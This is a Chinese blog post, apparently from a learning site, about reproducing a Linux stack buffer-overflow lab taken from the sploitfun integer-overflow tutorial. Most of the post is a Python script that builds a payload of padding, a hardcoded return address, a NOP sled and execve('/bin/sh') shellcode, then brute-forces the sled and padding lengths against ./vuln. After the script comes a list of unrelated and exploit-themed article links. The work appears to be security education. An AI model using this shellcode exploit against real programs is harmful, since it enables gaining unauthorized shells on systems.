学习Linux BOF的时候,看了这个文章,https://sploitfun.wordpress.com/2015/06/23/integer-overflow/ ,原文给出的exp无法成功, 此时除了计算并填充buf还可以用其他方法来复现这个问题:

#!/usr/bin/env python

import struct

from subprocess import call

def fuzzme(i,j):

    print i,j

    arg1 = "sploitfun"

#stack address where shellcode is copied.

    ret_addr = 0xbfffefb0 

#spawn a shell

#execve(/bin/sh)

    scode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

#endianess convertion

    def conv(num):

        return struct.pack("<I",num)

# arg2 = Junk + RA + NOP's + Shellcode

    arg2 = "A" * 24

    arg2 += conv(ret_addr);

    arg2 += "\x90" * i

    arg2 += scode

    arg2 += "C" * j

    print "Calling vulnerable program"

    call(["./vuln", arg1, arg2])

if __name__ == '__main__':

    for i in range(1,300):

        for j in range(1,300):

            fuzzme(i,j)



简单粗暴...

A trick in Exploit Dev的更多相关文章

  1. reds Virtual Memory

    Virtual Memory technical specification This document details the internals of the Redis Virtual Memo ...

  2. redis虚拟内存---官方文档

    http://redis.io/topics/internals-vm Virtual Memory technical specification This document details the ...

  3. BlackArch-Tools

    BlackArch-Tools 简介 安装在ArchLinux之上添加存储库从blackarch存储库安装工具替代安装方法BlackArch Linux Complete Tools List 简介 ...

  4. /dev/socket/vold exploit 本地提权漏洞

    EXPLOIT "0 asec create ../../../../../../../../xxxxx/xx/xx/xx 1 ext4 98235792350852308254872354 ...

  5. An iOS zero-click radio proximity exploit odyssey

    NOTE: This specific issue was fixed before the launch of Privacy-Preserving Contact Tracing in iOS 1 ...

  6. Machine Learning Trick of the Day (2): Gaussian Integral Trick

    Machine Learning Trick of the Day (2): Gaussian Integral Trick Today's trick, the Gaussian integral ...

  7. Machine Learning Trick of the Day (1): Replica Trick

    Machine Learning Trick of the Day (1): Replica Trick 'Tricks' of all sorts are used throughout machi ...

  8. Plain text considered harmful: A cross-domain exploit

    referer:http://balpha.de/2013/02/plain-text-considered-harmful-a-cross-domain-exploit/ Data from aro ...

  9. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

随机推荐

  1. VectorDrawable在Android中的配置

    一.让Android支持VectorDrawable apply plugin: 'com.android.application' android { defaultConfig { vectorD ...

  2. 8.0 TochAction各种用法

    1.滑动---TouchAction  支持相对坐标.绝对坐标.Element 注意看顶部的导入TouchAction这个库.. #实例化 action = TouchAction(driver) # ...

  3. c# 3D图形处理库

    C#的OpenGL类库SharpGL SharpGL 可以让你在 Windows Forms 或者 WPF 应用中轻松的使用 OpenGL 开发图形应用.更多SharpGL信息 Axiom 3D En ...

  4. linux备忘录-shell脚本

    知识 shell执行方式 shell执行方式有 通过source或. 在现在的bash环境中执行脚本 变量等会保持 通过bash shell.sh或sh shell.sh 使用一个新的bash环境执行 ...

  5. BFS搜索

    参考博客:[算法入门]广度/宽度优先搜索(BFS) 适用问题:一个解/最优解 重点:我们怎么运用队列?怎么记录路径? 假设我们要找寻一条从V0到V6的最短路径.(明显看出这条最短路径就是V0-> ...

  6. 最短路径——Bellman-Ford算法以及SPFA算法

    说完dijkstra算法,有提到过朴素dij算法无法处理负权边的情况,这里就需要用到Bellman-Ford算法,抛弃贪心的想法,牺牲时间的基础上,换取负权有向图的处理正确. 单源最短路径 Bellm ...

  7. 【bzoj4813】[Cqoi2017]小Q的棋盘 树上dfs+贪心

    题目描述 小Q正在设计一种棋类游戏.在小Q设计的游戏中,棋子可以放在棋盘上的格点中.某些格点之间有连线,棋子只能在有连线的格点之间移动.整个棋盘上共有V个格点,编号为0,1,2…,V-1,它们是连通的 ...

  8. JSON简介(2)

    例子: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3. ...

  9. CHM格式的电子书打开是空白的解决办法

    CHM是英语“Compiled Help Manual”的简写,即“已编译的帮助文件”.CHM是微软新一代的帮助文件格式,利用HTML作源文,把帮助内容以类似数据库的形式编译储存.

  10. [Leetcode] subsets 求数组所有的子集

    Given a set of distinct integers, S, return all possible subsets. Note: Elements in a subset must be ...